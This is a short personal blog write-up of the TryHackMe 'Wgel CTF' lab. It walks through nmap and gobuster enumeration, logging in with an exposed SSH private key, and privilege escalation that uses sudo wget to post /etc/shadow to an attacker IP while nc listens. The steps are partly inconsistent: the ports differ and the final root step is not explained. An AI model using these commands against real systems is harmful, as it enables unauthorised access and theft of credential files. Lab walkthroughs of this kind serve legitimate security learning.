Challenges: wgelctf (TryHackMe)

JebitokJebitok
1 min read

Table of contents

Wgel CTF

Start Machine

Have fun with this easy box.

Answer the questions below

  1. User flag

    nmap -sC -sV IP_Address

    on the source code of http://IP_ADDRESS there’s comment with name jessie

    just look around the site and enumerating we find the /sitemap/ path that has this interesting .ssh folder and several paths that didn’t have much helpful info

    gobuster dir -u http://IP_Address/sitemap/ -w /usr/share/wordlists/dirb/common.txt

    we copied the id_rsa into a file and set permissions. Then used id_rsa to low access, jessie, for the user flag

    ssh -i id_rsa jessie@<TARGET_IP>

    ls

    ls -la /Documents

    cat /Documents/user_flag.txt

  2. Root flag

    after running sudo -l my first thought was to check sudo under wget on GTFOBINS but it was a bit complicated later on learned of a different way through this article and GPT.

    sudo wget —post-file=/etc/shadow http://ATT_IP:443

    nc -lvnp 8000

    ls

    cat root_flag.txt

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

gobusterPrivilege EscalationCTF Writeuptryhackmewget

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.